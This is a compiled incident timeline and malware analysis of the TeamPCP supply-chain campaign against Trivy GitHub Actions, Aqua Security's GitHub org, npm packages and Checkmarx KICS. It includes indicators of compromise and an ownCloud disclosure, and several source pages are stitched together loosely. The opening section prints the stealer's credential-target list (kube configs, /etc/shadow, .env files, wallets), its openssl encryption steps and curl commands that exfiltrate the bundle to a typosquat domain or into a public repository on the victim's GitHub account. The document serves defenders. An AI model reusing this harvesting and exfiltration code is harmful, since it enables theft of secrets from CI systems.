Azure | ~/.azure/*, AZURE_* env vars |
Kubernetes | ~/.kube/config, /etc/kubernetes/*.conf, service |
Docker | ~/.docker/config.json, /kaniko/.docker/config.json |
Environment files | .env, .env.local, .env.production, .env.development, .env.staging, .env.test — |
Database | ~/.pgpass, ~/.my.cnf, ~/.mongorc.js, /etc/mysql/my.cnf, /etc/redis/redis.conf, |
Package managers | ~/.npmrc, ~/.vault-token, ~/.netrc |
CI/CD configs | terraform.tfvars, terraform.tfstate, .gitlab-ci.yml, .travis.yml, Jenkinsfile, .drone.yml, Anchor.toml, ansible.cfg |
TLS private keys | *.key, *.pem, *.p12, *.pfx across all |
VPN | /etc/wireguard/*.conf, wg showconf all |
Webhooks | Greps |
Shell history | ~/.bash_history, ~/.zsh_history, ~/.mysql_history, ~/.psql_history, ~/.rediscli_history |
System | /etc/passwd, /etc/shadow, auth logs |
Crypto wallets | Bitcoin (bitcoin.conf, wallet*.dat), Litecoin, |
Stage 2: Encryption (Lines 39–68)#
Before exfiltration, the malware
encrypts all collected data using a standard hybrid encryption scheme:
Bash
openssl rand 32 > "$_SESSION_KEY"
2>/dev/null
openssl enc -aes-256-cbc -in "$COLLECTED" -out
"$_ENC_FILE" \\
-pass
"file:$_SESSION_KEY" -pbkdf2 2>/dev/null
openssl pkeyutl -encrypt -pubin -inkey "$_PUB_KEY_PEM"
\\
-in
"$_SESSION_KEY" -out "$_ENC_KEY" \\
-pkeyopt
rsa_padding_mode:oaep 2>/dev/null
tar -czf "$_BUNDLE" -C "$_WORKDIR"
payload.enc session.key.enc 2>/dev/null
The implementation generates 32
bytes of random session material, which openssl enc uses via PBKDF2
to derive the actual AES-256-CBC key and IV. The session material is then
encrypted with the attacker's embedded RSA-4096 public key using OAEP padding.
Both files, the encrypted payload and the RSA-wrapped session material, are
bundled into tpcp.tar.gz.
Only the holder of the
corresponding RSA private key can unwrap the session material, which is
required to derive the AES key and decrypt the payload. Even if the bundle is
intercepted in transit, its contents remain inaccessible without the private
key.
Stage 3: Exfiltration (Lines
70–104)#
Primary
Channel: HTTPS POST to Typosquat Domain#
Bash
_HTTP=$(curl -s -o /dev/null -w "%{http_code}" -X
POST \\
-H
"Content-Type: application/octet-stream" \\
-H "X-Filename:
tpcp.tar.gz" \\
--data-binary
"@${_BUNDLE}" 2>/dev/null || echo "000")
The encrypted bundle is sent
to scan[.]aquasecurtiy[.]org ; note the misspelling of
"security" as "securtiy," a typosquat of the legitimate
Aqua Security domain. The custom header X-Filename:
tpcp.tar.gz identifies the payload type to the receiving server. The HTTP
status code is captured to determine whether the fallback channel is needed.
Fallback Channel: Victim's Own
GitHub Account#
If the primary endpoint returns a
non-2xx response and INPUT_GITHUB_PAT is available, the malware
repurposes that token against the victim. The trivy-action documentation
says github-pat can be either a GitHub Personal Access Token or GITHUB_TOKEN,
but the fallback's use of the /user/repos endpoint, which creates a
repository for the authenticated user, requires a user-scoped token (PAT or
equivalent). The default repository-scoped GITHUB_TOKEN would likely
fail at this step. This means the fallback channel is most dangerous for workflows
that pass a real PAT:
Bash
if [[ ! "$_HTTP" =~ ^2 ]] && [ -n
"${INPUT_GITHUB_PAT:-}" ]; then
_REPO="tpcp-docs"
_GH_AUTH="Authorization: token ${INPUT_GITHUB_PAT}"
_GH_API="
# Create public
repo on victim's account
curl -s -X POST
"${_GH_API}/user/repos" \\
-H
"$_GH_AUTH" \\
-d
'{"name":"tpcp-docs","private":false,"auto_init":true}'
...
# Create a
release with timestamped tag
_TAG="data-$(date +%Y%m%d%H%M%S)"
_RELEASE_ID=$(curl
-s -X POST "${_GH_API}/repos/${_GH_USER}/tpcp-docs/releases" ...)
# Upload
encrypted bundle as release asset
curl -s -X POST \\
"
\\
--data-binary
"@${_BUNDLE}" ...
fi
This fallback creates a public repository
named tpcp-docs on the victim's own GitHub account, creates a release
with a timestamped tag, and uploads the encrypted bundle as a release asset.
The attacker can then search GitHub for tpcp-docs repositories to
locate and download stolen data.
The design is notable for its
resilience: the data is stored on GitHub's own infrastructure, which is
unlikely to be blocked by corporate firewalls or network policies. The
innocuous repository name avoids immediate suspicion, and the attacker requires
no additional infrastructure to retrieve exfiltrated material.
Cleanup (Lines
103–105)#
Bash
rm -rf "$_WORKDIR" "$_PUB_KEY_PEM"
fi
rm -f "$COLLECTED"
All temporary files are removed.
The only persistent traces are the tpcp-docs repository (if the
fallback was triggered) and network logs showing the outbound HTTPS POST.
Attribution#
The malware self-identifies
as TeamPCP Cloud stealer in a Python comment on the final line of the
embedded filesystem credential harvester. TeamPCP, also tracked as DeadCatx3,
PCPcat, and ShellForce, is a documented cloud-native threat actor known for
exploiting misconfigured Docker APIs, Kubernetes clusters, Ray dashboards, and
Redis servers. The group has been linked to worm-driven ransomware, data
exfiltration, and cryptomining campaigns, and was profiled
by Flare and reported
on by The Hacker News in February 2026.
The credential targets in this
payload are consistent with the group's broader cloud-native
theft-and-monetization profile. The heavy emphasis on Solana validator keypairs
and cryptocurrency wallets is less well-documented as a TeamPCP hallmark,
though it aligns with the group's known financial motivations. The
self-labeling could be a false flag, but the technical overlap with prior
TeamPCP tooling makes genuine attribution plausible.
Remediation#
Organizations should stop
using trivy-action by version tag immediately. The only safe options are
pinning to commit SHA 57a97c7e7821a5776cebc9bb87c984fa69cba8f1 or
using tag 0.35.0 exclusively.
Any pipeline that executed a
poisoned tag should be treated as fully compromised. All secrets accessible to
that workflow including cloud credentials, SSH keys, API tokens, database
passwords, Docker registry tokens should be rotated immediately.
Security teams should audit their
GitHub organization for tpcp-docs repositories and review GitHub
Actions logs for any trivy-action runs occurring after approximately
19:00 UTC on March 19, 2026.
Indicators of Compromise (IOCs)#
Network
Indicators#
- scan[.]aquasecurtiy[.]org
File
Hashes#
- 18a24f83e807479438dcab7a1804c51a00dafc1d526698a66e0640d1e5dd671a
(SHA256, entrypoint.sh)
Compromised
Actions#
- aquasecurity/[email protected] (f7773844)
- aquasecurity/[email protected] (f5c9fd92)
- aquasecurity/[email protected] (22e864e7)
- aquasecurity/[email protected] (6ec7aaf3)
- aquasecurity/[email protected] (555e7ad4)
- aquasecurity/[email protected] (794b6d99)
- aquasecurity/[email protected] (506d7ff0)
- aquasecurity/[email protected] (91d5e0a1)
- aquasecurity/[email protected] (252554b0)
- aquasecurity/[email protected] (b9faa60f)
- aquasecurity/[email protected] (3c615ac0)
- aquasecurity/[email protected] (c19401b2)
- aquasecurity/[email protected] (4209dcad)
- aquasecurity/[email protected] (61fbe20b)
- aquasecurity/[email protected] (0d49ceb3)
- aquasecurity/[email protected] (2e7964d5)
- aquasecurity/[email protected] (1d74e4cf)
- aquasecurity/[email protected] (3201dddd)
- aquasecurity/[email protected] (ea56cd31)
- aquasecurity/[email protected] (9738180d)
- aquasecurity/[email protected] (ef3a510e)
- aquasecurity/[email protected] (bb75a905)
- aquasecurity/[email protected] (9e8968cb)
- aquasecurity/[email protected] (7f6f0ce5)
- aquasecurity/[email protected] (0891663b)
- aquasecurity/[email protected] (3dffed04)
- aquasecurity/[email protected] (cf1692a1)
- aquasecurity/[email protected] (848d665e)
- aquasecurity/[email protected] (fa4209b6)
- aquasecurity/[email protected] (8cfb9c31)
- aquasecurity/[email protected] (18f01feb)
- aquasecurity/[email protected] (7b955a5e)
- aquasecurity/[email protected] (d488f438)
- aquasecurity/[email protected] (fa78e67c)
- aquasecurity/[email protected] (a5b4818d)
- aquasecurity/[email protected] (6fc874a1)
- aquasecurity/[email protected] (2a51c5c5)
- aquasecurity/[email protected] (ddb66974)
- aquasecurity/[email protected] (aa3c46a9)
- aquasecurity/[email protected] (4bdcc5d9)
- aquasecurity/[email protected] (b745a35b)
- aquasecurity/[email protected] (da73ae07)
- aquasecurity/[email protected] (7550f14b)
- aquasecurity/[email protected] (8aa8af3e)
- aquasecurity/[email protected] (e53b0483)
- aquasecurity/[email protected] (276ca968)
- aquasecurity/[email protected] (8ae5a08a)
- aquasecurity/[email protected] (820428af)
- aquasecurity/[email protected] (cf19d27c)
- aquasecurity/[email protected] (405e91f3)
- aquasecurity/[email protected] (2297a1b9)
- aquasecurity/[email protected] (2b1dac84)
- aquasecurity/[email protected] (f4f1785b)
- aquasecurity/[email protected] (3d1b5be1)
- aquasecurity/[email protected] (985447b0)
- aquasecurity/[email protected] (85cb72f1)
- aquasecurity/[email protected] (38623bf2)
- aquasecurity/[email protected] (9092287c)
- aquasecurity/[email protected] (b7befdc1)
- aquasecurity/[email protected] (9ba3c3cd)
- aquasecurity/[email protected] (fd090040)
- aquasecurity/[email protected] (e0198fd2)
- aquasecurity/[email protected] (ddb94181)
- aquasecurity/[email protected] (b7252377)
- aquasecurity/[email protected] (66c90331)
- aquasecurity/[email protected] (c5967f85)
- aquasecurity/[email protected] (9c000ba9)
- aquasecurity/[email protected] (ad623e14)
- aquasecurity/[email protected] (85190378)
- aquasecurity/[email protected] (fd429cf8)
- aquasecurity/[email protected] (19851bef)
- aquasecurity/[email protected] (91e7c2c3)
- aquasecurity/[email protected] (ab6606b7)
- aquasecurity/[email protected] (a9bc513e)
- aquasecurity/[email protected] (ddb9da44)
Phase 04
Obfuscation
(1 event)
Thu, Mar 19- 00:08:33 - 00:09:00 UTC
Discussion #10420 Flooded
~100 accounts posted generic praise
comments within ~30 seconds, drowning technical discussion and incident
coordination. Includes troll comments referencing "sugma" and
"ligma".
Phase
06 ICP Fallback Activated
(6 events)
Sun, Mar
22 ~11:45 UTC
kamikaze.sh v1 Payload Active on ICP C2 @CharlieEriksen
~12:45 UTC
kamikaze.sh v2: Modular Architecture
ICP canister now redirects to
Cloudflare tunnel. Payload evolved from monolithic bash to 15-line loader that
fetches kube.py from C2 at runtime, then self-deletes.
~13:00 UTC
kamikaze.sh v3: Now a Worm
Major pivot: no longer K8s-focused.
Now a self-propagating worm targeting SSH keys and exposed Docker APIs (port
2375). Scans local /24 subnet, parses auth logs for targets.
~13:25 UTC
kamikaze.sh v3.1: Two-Module Architecture
Payload split into separate
modules: kube.py (K8s DaemonSets) + prop.py (worm
spreading). K8s module appears degraded (placeholder base64), but worm module
fully functional.
14:56 UTC
kamikaze.sh v3.2: Production-Ready Deployment
C2 infrastructure rotated. The
placeholder PYTHON_B64 from v3.1 now contains actual ICP backdoor
payload—v3.1 appears to have been a dev/test build.
~16:15 UTC
kamikaze.sh v3.3: WAV Steganography
Payloads now hidden in WAV audio
files. Python modules embedded as base64 in audio frames, extracted at runtime.
Evades .py filters and static analysis.
Phase 07 Docker Hub Direct Push
(4 events, 3 milestones)
Sun, Mar 22- 15:43 UTC
aquasec/trivy:0.69.5 pushed to Docker Hub
Attacker
pushes malicious image directly to Docker Hub, bypassing the GitHub release
process entirely. No corresponding v0.69.5 tag exists on GitHub—this is a
direct registry attack using compromised credentials. Image propagates to
third-party mirrors including mirror.gcr.io.
Docker Hub (link
broken)
16:34 UTC
aquasec/trivy:0.69.6 pushed to Docker Hub
Second
malicious image pushed less than an hour after 0.69.5. Attacker continues to
exploit Docker Hub access while GitHub-side compromise is being remediated.
Spotted by @rut64449 in GitHub discussion.
Docker Hub (link broken)
Mar 22, 20:31–20:32 UTC
Using
compromised Argon-DevOps-Mgt service account, attacker defaced 44
repositories in aquasec-com—Aqua's internal GitHub org—in a 2-minute
automated blitz. All repos renamed with tpcp-docs- prefix; internal
assets now publicly exposed.
Internal Aqua Repos Publicized via aquasec-com Org
OpenSourceMalware
MAR
23, 2026
TeamPCP
Defaces Aqua Security’s Internal GitHub Org
TeamPCP compromised the aquasec-com
GitHub organization, renaming all 44 repositories and exposing internal source
code, CI/CD configs, and knowledge bases.
The OpenSourceMalware team has identified an active compromise
of the aquasec-com GitHub organization — Aqua Security's internal org
for proprietary code. The threat actor TeamPCP (aka DeadCatx3,
PCPcat, ShellForce) defaced all 44 repositories in a scripted 2-minute burst,
renaming every repo with a tpcp-docs- prefix and setting all
descriptions to "TeamPCP Owns Aqua Security." Our forensic analysis
of the GitHub Events API points to a compromised service account token — likely
stolen during TeamPCP's prior Trivy GitHub Actions compromise — as the attack
vector.
This is not the first time TeamPCP
has targeted Aqua Security. It's the latest escalation from a threat actor that
has been building capability across the cloud-native ecosystem for months.
TL;DR
- Threat
Actor: TeamPCP (aka DeadCatx3, PCPcat, ShellForce,
CanisterWorm) - Target: aquasec-com GitHub
organization (Aqua Security's internal/private org) - Impact: 44
internal repos defaced, renamed, and exposed publicly — including source
code for Tracee, internal Trivy forks, CI/CD pipelines, Kubernetes
operators, and team knowledge bases - Attack
Vector: Compromised Argon-DevOps-Mgt service
account token (high confidence) - Key
Finding: The threat actor tested the stolen token 7 hours
before the defacement by creating and deleting a ghost branch
on aquasecurity/trivy-plugin-aqua — the public Aqua Security org
is also at risk
Discovery
On March 22, 2026, we observed all
44 repositories in the aquasec-com GitHub organization had been
simultaneously renamed and defaced. The org profile
at github.com/orgs/aquasec-com showed every repo prefixed
with tpcp-docs- and carrying the description "TeamPCP Owns Aqua
Security."
The aquasec-com org
(GitHub ID 203123164, created 2025-03-13) is distinct from Aqua Security's
well-known open-source org aquasecurity (ID 12783832, created
2015-06-07, 219 public repos). The compromised org appears to be their internal
org for proprietary code — making this exposure particularly damaging.
The
Defacement: A 2-Minute Automated Blitz
Using the GitHub Events API and
repo metadata, we reconstructed the exact timeline. All 44 repos were modified
between 20:31:07 UTC and 20:32:26 UTC — a
~2-minute window that confirms
automated scripting via the GitHub API:
Time | Renamed | Original |
20:31:07 | tpcp-docs-aqua-deployer | aqua-deployer |
20:31:15 | tpcp-docs-tracee | tracee |
20:31:17 | tpcp-docs-aqua-trivy | aqua-trivy |
20:31:24 | tpcp-docs-supply-chain-lambdas | supply-chain-lambdas |
20:31:53 | tpcp-docs-cicd | cicd |
20:32:05 | tpcp-docs-tracee-detectors | tracee-detectors |
20:32:14 | tpcp-docs-aquai | aquai |
20:32:20 | tpcp-docs-kb-personal-yaniv | kb-personal-yaniv |
20:32:24 | tpcp-docs-kube-hunter | kube-hunter |
... | (44 repos total) | ... |
|
Every
repo received the description: "TeamPCP Owns Aqua Security."
The attack was trivially a loop
of PATCH /repos/{org}/{repo} calls with the new name and description.
GitHub's public events API does not log repo rename or description change
operations, making the defacement invisible in events — only the updated_at timestamps
on each repo betray the exact timing.
Ground
Zero: The Argon-DevOps-Mgt Service Account
Our forensic analysis
identified Argon-DevOps-Mgt as the high-confidence compromised
account. This is a service/bot account (GitHub ID 139343333, created
2023-07-12) with a critical property: it bridges both GitHub orgs.
Cross-Org
Admin Access
- `aquasec-com`
org: 43 PublicEvent operations over 1.5 years (making
repos public requires admin access) - `aquasecurity`
org: Creating releases (v0.217.1, v0.218.0, v0.218.1) and
triggering workflows on trivy-plugin-aqua
One compromised token for this
account gives the attacker write/admin access to both organizations.
The
Ghost Branch: Token Testing at 13:24 UTC
Seven hours before the defacement,
at 13:24:25 UTC, the Argon-DevOps-Mgt account created a
branch
named update-plugin-links-v0.218.2 on aquasecurity/trivy-plugin-aqua and deleted
it at the exact same second (GitHub event IDs 9676884051 and
9676884079).
This
is anomalous for three reasons:
- No
v0.218.2 release or tag exists — only v0.218.0 and v0.218.1 - No
workflow run was triggered — the established pattern for this
account (confirmed across v0.217.1, v0.218.0, v0.218.1) is that branch
creation triggers a create pr workflow. No such run exists for
v0.218.2 - The
branch name follows the account's naming convention —
the threat actor mimicked the
expected update-plugin-links-vX.Y.Z pattern, suggesting they
studied the account's behavior before acting
This is consistent with a threat
actor testing a stolen token's capabilities — creating a
branch to confirm write access, then immediately deleting it to minimize
detection, before proceeding with the main attack 7 hours later.
Why
This Account?
- Zero
followers, zero public repos, no bio, no social links — a pure service
account - Uses pusher_type:
"user" (not a GitHub App), indicating a PAT-based
authentication - Service
accounts typically use long-lived Personal Access Tokens without
MFA - The
account triggers CI workflows on trivy-plugin-aqua — its token
was present in CI runner environments
The
Kill Chain: From Trivy Compromise to Org Defacement
TeamPCP has been systematically targeting the Aqua Security
ecosystem. The credential theft chain is:
Stage
1: Trivy GitHub Actions Tag Poisoning (documented by
Socket.dev)
- TeamPCP
compromised Trivy GitHub Actions tags, injecting a credential harvester - The
harvester (self-identified as "TeamPCP Cloud stealer" in its
source) systematically scraped CI runners for GitHub tokens, SSH keys,
cloud credentials, and environment variables
Stage
2: Token Harvesting
- The Argon-DevOps-Mgt service
account's PAT was likely captured from a CI runner during Stage 1 - As a
service account that triggers workflows on trivy-plugin-aqua, its
token was present in the runner environment
Stage
3: Reconnaissance (March 22, 13:24 UTC)
- Threat
actor tested the token by creating and deleting a branch
on aquasecurity/trivy-plugin-aqua - Confirmed
write access to the aquasecurity org
Stage
4: Enumeration and Scripting (~13:25–20:30 UTC)
- Threat
actor enumerated repos in the aquasec-com org via the API - Prepared
a defacement script to rename all repos and change descriptions
Stage
5: Defacement (March 22, 20:31 UTC)
- Executed
automated API calls to rename all 44 repos
with tpcp-docs- prefix - Set
all descriptions to "TeamPCP Owns Aqua Security." - Completed
in under 2 minutes
What
Was Exposed
The 44 internal repos span Aqua Security's entire
engineering organization:
Core
Security Products:
- tracee —
Runtime security engine (private fork with internal features) - tracee-detectors —
Detection rules and test automation - aqua-trivy —
Internal Trivy customization - kube-hunter —
Kubernetes penetration testing tool - aquai —
AI product (with GitHub Pages deployment)
Infrastructure
& CI/CD:
- cicd —
CI/CD pipeline configurations - infra-provisioner —
Infrastructure provisioning (Terraform, GKE) - supply-chain-lambdas —
AWS Lambda functions - arc / arc-aquasec-com —
Actions Runner Controller configs - rhel-eks-ami —
Custom AMI builds
Internal
Tooling:
- aqua-react —
Frontend UI application - go-utils / cnapp-go-utils —
Shared Go libraries with proto definitions - .github-private —
Shared GitHub Actions workflows with ECR login, deployment configs
Knowledge
Bases:
- kb-shared, kb-team-tracee, kb-group-runtime, kb-personal-yaniv, kb-projects
Any
secrets, API keys, or credentials in these repos or their CI/CD configurations
should be considered
compromised.
Who
is TeamPCP?
TeamPCP is a cloud-native threat
actor that has been escalating in capability throughout 2025-2026:
Attribute | Detail |
Aliases | DeadCatx3, PCPcat, ShellForce, CanisterWorm |
Tracked By | Flare, Aikido Security, Socket.dev, The Hacker News, |
Known TTPs | Docker API exploitation, Kubernetes cluster compromise, |
Notable CVEs | CVE-2025-29927, CVE-2025-55182 (React2Shell) |
C2 Infrastructure | ICP Canisters (first observed), Cloudflare Tunnels |
Their
progression shows increasing sophistication:
- Cloud
exploitation — Misconfigured Docker APIs, Kubernetes, Redis,
Ray dashboards - Supply
chain attacks — Trivy GitHub Actions tag compromise, NPM
package compromise - CanisterWorm —
Self-propagating worm using ICP Canister for C2 (first-of-its-kind) - Kubernetes
wipers — Destructive payloads targeting Iran (reported by
Aikido, March 22, 2026) - Org-level
compromise — This attack against aquasec-com
Indicators
of Compromise (IOCs)
Domains
aquasecurtiy.org
scan.aquasecurtiy.org
C2 Infrastructure
tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io
championships-peoples-point-cassette.trycloudflare.com
investigation-launches-hearings-copying.trycloudflare.com
souls-entire-defined-routes.trycloudflare.com
GitHub Artifacts
Organization: github.com/aquasec-com (compromised)
Defacement pattern: "tpcp-docs-" prefix on all
repo names
Defacement message: "TeamPCP Owns Aqua Security."
Compromised account: Argon-DevOps-Mgt (GitHub ID 139343333)
Defacement timestamp: 2026-03-22T20:31:07Z to
2026-03-22T20:32:26Z
Token test timestamp: 2026-03-22T13:24:25Z (ghost branch on
trivy-plugin-aqua)
File System Indicators
/tmp/pglog (CanisterWorm payload drop path)
VirusTotal
18a24f83e807479438dcab7a1804c51a00dafc1d526698a66e0640d1e5dd671a
Recommendations
For Aqua Security:
- Immediately
revoke all tokens/PATs for Argon-DevOps-Mgt and all service
accounts - Review
the aquasec-com org audit log to confirm the compromised account
and attacker IP - Audit
the aquasecurity public org — the same token has confirmed write
access - Rotate
all secrets referenced in exposed repos (AWS keys, API tokens,
LaunchDarkly keys, Jenkins credentials) - Scan
CI/CD runners for TeamPCP indicators (/tmp/pglog, ICP canister
connections)
For the Community:
- If
you depend on aquasecurity/trivy-plugin-aqua, verify recent releases
were not tampered with - Pin
GitHub Actions to full commit SHAs, not tags - Audit
service account tokens — enforce short-lived tokens and least-privilege
scoping - Monitor
for the IOCs listed above in your CI/CD environments
References
- Socket.dev - Trivy Under Attack Again: GitHub Actions Tag
Compromise - Aikido Security - TeamPCP deploys CanisterWorm on NPM
- Aikido Security - CanisterWorm Gets Teeth: TeamPCP's
Kubernetes Wiper Targets Iran - The Hacker News - TeamPCP Worm Exploits Cloud
Infrastructure - Flare - TeamPCP: An Emerging Force in Cloud Native and
Ransomware - Maltrail - hacked_trivy.txt indicators
- ramimac - AWS Customer Security Incidents ACTORS.md
Conclusion
This compromise demonstrates the
long tail of supply chain attacks. A credential harvested during the Trivy
GitHub Actions compromise months ago was weaponized today to deface an entire
internal GitHub organization. The Argon-DevOps-Mgt service account —
a single bot account bridging two orgs with a long-lived PAT — was the weak
link.
TeamPCP continues to escalate. From
cloud exploitation to supply chain worms to Kubernetes wipers, they are
building capability and targeting the security vendor ecosystem itself. The
irony of a cloud security company being compromised by a cloud-native threat
actor should not be lost on the industry.
If you encounter similar defacement
patterns, compromised tokens, or TeamPCP indicators, please report them
to OpenSourceMalware.com.
Stay safe out there.
Tags: #supply-chain #github #TeamPCP #aquasecurity #c2
#worm #ioc
23:20 UTC
aquasec-com Repositories
CleanedInternal org repos restored and defacement removed
Sun, Mar 22- 01:40 UTC
Malicious Docker Tags Removed. All
15 tags removed from Docker Hub (0.69.5, 0.69.6, latest + arch variants) — ~9.5
hour exposure window.
Mon, Mar
23- 06:25 UTC
mirror.gcr.io Images Removed. Google removes cached malicious
images from mirror.gcr.io after Aqua outreach. Confirmation.
Fri, Mar 27- 12:00 UTC
ownCloud discloses build infrastructure compromise
ownCloud confirms Trivy supply
chain attack (CVE-2026-33634) exposed build credentials. Container images and
nightly builds since March 19 removed; security patch releases delayed
weeks while systems are rebuilt.
Disclosure
Security
Notice: Impact of CVE-2026-33634 on ownCloud Build Infrastructure
post by jordana on Mar 27
On March 19, 2026, a critical
supply chain attack compromised Aqua Security’s Trivy vulnerability scanner
(CVE-2026-33634, CVSS 9.4). This attack affected organizations worldwide that
use Trivy in their CI/CD pipelines. ownCloud was among those affected.
The key facts: No customer data was
compromised. No source code was altered. The attack affected our build
infrastructure only – specifically the systems that produce container images
and client binaries. We have contained the incident, but our ability to ship
new builds and patches is temporarily suspended.
Trivy is a widely-used open source
security scanner maintained by Aqua Security. It’s an industry-standard tool
used by thousands of projects and companies to scan container images and code
for vulnerabilities. On March 19, attackers used previously compromised
credentials to inject malicious code into official Trivy releases (v0.69.4 and
later), turning a trusted security tool into a vehicle for credential theft.
This is not an ownCloud only
vulnerability. Every open source project that uses Trivy in conjunction
with an latest open source CI/CD pipeline is potentially affected by this
attack. ownCloud happens to be one of them.
The compromised Trivy version ran
in our build environment, which means access credentials for our build and
release infrastructure were likely exposed to the attackers. Here’s what that
means in practice:
·
Source code: Not touched. Not altered.
Our code repositories remain intact.
·
Build artifacts: Container images and
nightly client builds created after March 19 are considered potentially
compromised. We have removed all of them from public distribution channels
(Docker Hub, quay.io, GitHub, NPMjs).
·
Stable releases: Previously published
stable releases that pre-date March 19 are unaffected.
·
Customer data: No customer-facing systems
or customer data were exposed or affected at any point.
·
Mobile apps: No new versions were
published to iOS or Android app stores since the breach.
Action Required:
ocis-rolling Image Users
If you are using the ocis-rolling
container image, please contact us immediately at [email protected] The rolling
image may have been built during the exposure window and should not be used
until further notice. Replace it with a known-good tagged release that
pre-dates March 19, 2026.
Current Status and What Comes
Next
We’ve taken aggressive containment measures:
• All affected build systems have
been shut down or isolated.
• All known-exposed credentials and
tokens have been revoked.
• All potentially compromised
artifacts have been removed from public repositories.
• Kiteworks has mobilized resources
from across the entire group to fast-track the resolution.
What this means for releases:
We currently cannot produce any new patches, builds, or releases for any
ownCloud product. This includes oCIS, oC10, the desktop client, iOS and Android
and their related components. We don’t yet know how long restoration will take.
Realistically, we are looking at a delay of several weeks before build
infrastructure is fully restored and verified. We understand this impacts
promised delivery timelines and we will communicate updated schedules as soon
as we have clarity.
We are running a full forensic
analysis of all affected systems and simultaneously evaluating alternative
build pipelines to restore release capability as quickly as possible.
We believe the open source
community deserves honest, timely communication about incidents like these.
Supply chain attacks represent one of the most serious threats facing the
software ecosystem today. The irony that a security scanning tool was weaponized
to attack the very projects it was meant to protect is not lost on us.
Aqua Security Advisory: GHSA-69fq-xp46-6x23
CVE Record: CVE-2026-33634
Aqua Security Blog: What
You Need to Know
Contact: [email protected]
ownCloud GmbH – a Kiteworks Company
Some
important takeaways:
- No
customer data was touched or breached - If
you are using a build before March 19, no action is needed - If
you are using ocis-rolling image contact [email protected] you may
need to take action asap - We
will unfortunately have delays with pushing any new releases and will send
updates on our progress.
Response
and Aftermath
(3 milestones)
Sun, Mar 22- 21:31 UTC
✓ICP Canister DenylistedC2 endpoint
taken down due to policy violation
Wed, Mar 25
Mar 25
"We know over 1,000
impacted SaaS environments right now that are actively dealing with this
particular threat campaign.— Charles Carmakal, Chief Technology Officer,
Mandiant Consulting
16:50 UTC
✓Spam Flood Accounts RemovedGitHub
removed ~120 accounts involved in the spam campaign.
Thu, Mar 26-13:00 UTC
✓CISA Adds CVE-2026-33634 to KEV
CatalogCISA adds TeamPCP supply chain campaign to KEV catalog. Federal agencies
have 21 days to remediate.
Mar 20-21 CanisterWorm
(npm)
Worm deployed via stolen npm
tokens. 28+ packages infected in <60s; payload harvested credentials and
self-propagated.
35
IOCs
Network
Indicators- 5
cloudflare tunnels
souls-entire-defined-routes.trycloudflare.comkamikaze v1
investigation-launches-hearings-copying.trycloudflare.comkamikaze
v2
championships-peoples-point-cassette.trycloudflare.comkamikaze
v3/v3.1
create-sensitivity-grad-sequence.trycloudflare.comkamikaze
v3.2/v3.3
icp
canister
tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.ioMarch CanisterWorm C2
File
Hashes- 7
canisterworm malware
e9b1e069efc778c1e77fb3f5fcc3bd3580bbc810604cbf4347897ddb4b8c163bindex.js
variant
61ff00a81b19624adaad425b9129ba2f312f4ab76fb5ddc2c628a5037d31a4baindex.js
variant
0c0d206d5e68c0cf64d57ffa8bc5b1dad54f2dda52f24e96e02e237498cb9c3aindex.js
variant
c37c0ae9641d2e5329fcdee847a756bf1140fdb7f0b7c78a40fdc39055e7d926index.js
variant
f398f06eefcd3558c38820a397e3193856e4e6e7c67f81ecc8e533275284b152deploy.js
variant
7df6cef7ab9aae2ea08f2f872f6456b5d51d896ddda907a238cd6668ccdc4bb7deploy.js
variant
5e2ba7c4c53fa6e0cef58011acdd50682cf83fb7b989712d2fcf1b5173bad956deploy.js
variant
GitHub
Artifacts- 6
npm
packages
@EmilGroup/*28 packages compromised
@opengov/*16 packages compromised
@teale.io/[email protected] variant
@teale.io/[email protected] variant
@airtm/uuid-base32compromised
@pypestream/floating-ui-domcompromised
Malware
Signatures- 17
persistence paths
/var/lib/svc_internal/runner.pykamikaze v1
/etc/systemd/system/internal-monitor.servicekamikaze v1
/var/lib/pgmon/pgmon.pykamikaze v3 worm
/etc/systemd/system/pgmonitor.servicekamikaze v3 worm
~/.config/systemd/user/pgmon.serviceCanisterWorm npm
~/.local/share/pgmon/service.pyCanisterWorm backdoor
~/.npmrcharvested for npm tokens
/etc/npmrcharvested for npm tokens
/tmp/.pg_statestate tracking
/tmp/pglogtemp staging
kubernetes
host-provisioner-stdDaemonSet
host-provisioner-iranDaemonSet (wiper)
kamikazeContainer (hostPID: true)
provisionerContainer name
network
behavior
Scans ports 22, 2375 on local /24worm behavior
/var/log/auth.logparsed for targets
youtube.com connectivity checkkill switch (50-min poll)
Payload
Repositories
- litellm_1.82.8 —
3-stage payload w/ RSA-4096 key - litellm_1.82.7 —
RC4 obfuscation variants - telnyx_4.87.1 —
WAV steganography delivery - MalwareBazaar —
Community samples + YARA
Socket
https://socket.dev/blog/canisterworm-npm-publisher-compromise-deploys-backdoor-across-29-packages
Aikido
https://www.aikido.dev/blog/teampcp-deploys-worm-npm-trivy-compromise
ICP Deep Dive
Mar
23- KICS & AST (Checkmarx) - 7 events
Compromised via service account.
126 GitHub Action tags force-pushed to malicious commits; payload stole CI/CD
secrets.
Statement
(https://checkmarx.com/blog/ongoing-security-updates/)
15
IOCs
✦ TeamPCP Attacks KICS
https://www.wiz.io/blog/teampcp-attack-kics-github-action
Phase 08 Checkmarx Ecosystem
(3
events, 3 milestones)
Mon, Mar
23- 12:53 UTC
Malicious
extensions published to OpenVSX
Two
extensions pushed via compromised ast-phoenix account, 12 seconds
apart: ast-results v2.53.0 and cx-dev-assist v1.7.0.
Payload checks for cloud credentials before downloading second-stage
from checkmarx[.]zone. VS Code Marketplace unaffected.
12:58–16:50 UTC
35
KICS versions redirected to malicious commits
Attacker
compromises cx-plugins-releases service account (ID 225848595) and
updates all 35 tags (v1 through v2.1.20) to point to staged commits
containing setup.sh credential stealer. ~4 hour exposure window
before takedown.
Mar 23
All
91 versions of Checkmarx/ast-github-action compromised
Attacker force-pushed all 91
existing tags to malicious commits via
compromised cx-plugins-releases account. Same payload as
KICS: setup.sh entry point, credential scraping, encrypted exfil
to checkmarx[.]zone. Checkmarx deleted all versions post-incident, leaving
only clean 2.3.33.
Sysdig
GitHub Activity Log
https://github.com/Checkmarx/ast-github-action
16:50 UTC
KICS Repository Taken Down
Community member reports compromise; repo taken offline. ~4
hour exposure window.
18:59 UTC
KICS Repository Restored. Maintainers
confirm incident resolved; repo reinstated.
Mon, Mar 23- 03:38 UTC
Clean OpenVSX Versions Published
ast-results v2.56.0 and cx-dev-assist v1.10.0 published (~15
hours after compromise). Malicious versions still downloadable as of 09:00 UTC.
Sat, Apr 25- 12:00 UTC
Phase
